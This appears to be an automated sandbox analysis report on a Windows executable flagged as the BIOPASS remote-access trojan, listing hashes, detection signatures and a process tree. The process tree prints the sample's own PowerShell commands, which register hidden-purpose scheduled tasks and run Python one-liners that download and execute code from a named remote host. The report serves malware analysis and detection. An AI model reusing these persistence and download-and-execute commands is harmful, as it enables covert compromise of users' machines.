Overview

overview

10

Static

static

10

7f4e02a041...c0.exe

windows7_x64

10

7f4e02a041...c0.exe

windows10_x64

10

Analysis

  • max time kernel
    75s
  • max time network
    115s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-07-2021 07:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe

  • Size

    4.8MB

  • MD5

    0bbe5966c5ea998605215df6ef88ad90

  • SHA1

    bce97a45e856b71dc8d48ae12b04f69eb6d191d1

  • SHA256

    7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0

  • SHA512

    14b74fc9dcd6249bd9c4e4d0a41137898864f7d936d1a4964e212c1f13e60f846107d176d32aba65dac649cc8899d6842744e2909e813f7ab32ece8023a2a3dd

Score
10/10
biopassdiscoverypersistencerattrojan

Malware Config

Signatures

  • biopass

    BIOPASS is a RAT connected with Winnti group (APT41).

    rattrojanbiopass
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 28 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe
    "C:\Users\Admin\AppData\Local\Temp\7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Windows\system32\ping.exe
      ping www.baidu.com
      2⤵
      • Runs ping.exe
      PID:64
    • C:\Windows\system32\cmd.exe
      cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3824
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3412
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN SYSTEM_SETTINGS
        3⤵
          PID:3936
      • C:\Windows\system32\cmd.exe
        cmd /c "C:\Users\Public\vc.exe /install /quiet /norestart"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1688
        • C:\Users\Public\vc.exe
          C:\Users\Public\vc.exe /install /quiet /norestart
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:524
          • C:\Windows\Temp\{EAC26593-6175-45B4-B24F-33D7C7B908C1}\.cr\vc.exe
            "C:\Windows\Temp\{EAC26593-6175-45B4-B24F-33D7C7B908C1}\.cr\vc.exe" -burn.clean.room="C:\Users\Public\vc.exe" -burn.filehandle.attached=596 -burn.filehandle.self=604 /install /quiet /norestart
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:4052
            • C:\Windows\Temp\{2C21797D-7793-43CB-82E9-AAF153E09B41}\.be\VC_redist.x86.exe
              "C:\Windows\Temp\{2C21797D-7793-43CB-82E9-AAF153E09B41}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{36713A3C-7C10-4665-BF6F-315B6F5F0E92} {3E826051-191B-4838-A4CE-19564B1A5BC9} 4052
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Modifies registry class
              PID:4024
      • C:\Windows\system32\cmd.exe
        cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1596
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4080
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Run /TN SYSTEM_TEST
          3⤵
            PID:3080
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /DELETE /F /TN SYSTEM_TEST
            3⤵
              PID:2848
          • C:\Windows\system32\cmd.exe
            cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:788
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2240
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Run /TN SYSTEM_CDAEMON
              3⤵
                PID:2276
          • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
            C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\')).read().decode())')" a a
            1⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1832
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:528
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
            1⤵
            • Checks SCSI registry key(s)
            • Modifies data under HKEY_USERS
            PID:2732
          • C:\Windows\system32\srtasks.exe
            C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1260
          • C:\Users\Public\Silverlight.exe
            C:\Users\Public\Silverlight.exe
            1⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2124
            • \??\c:\2bf4b7860feb9bf1f51c7d5e\install.exe
              c:\2bf4b7860feb9bf1f51c7d5e\install.exe
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:4032
          • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
            C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\')).read().decode())')" a a
            1⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:3292

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/2240-216-0x000001564BF03000-0x000001564BF05000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2240-227-0x000001564BF06000-0x000001564BF08000-memory.dmp

            Filesize

            8KB

            Download

          • memory/2240-215-0x000001564BF00000-0x000001564BF02000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3412-125-0x000001CFF9983000-0x000001CFF9985000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3412-126-0x000001CFF9F10000-0x000001CFF9F11000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3412-133-0x000001CFF9986000-0x000001CFF9988000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3412-124-0x000001CFF9980000-0x000001CFF9982000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3412-121-0x000001CFF9990000-0x000001CFF9991000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4032-217-0x0000000000860000-0x0000000000861000-memory.dmp

            Filesize

            4KB

            Download

          • memory/4080-194-0x0000024477226000-0x0000024477228000-memory.dmp

            Filesize

            8KB

            Download

          • memory/4080-187-0x0000024477223000-0x0000024477225000-memory.dmp

            Filesize

            8KB

            Download

          • memory/4080-186-0x0000024477220000-0x0000024477222000-memory.dmp

            Filesize

            8KB

            Download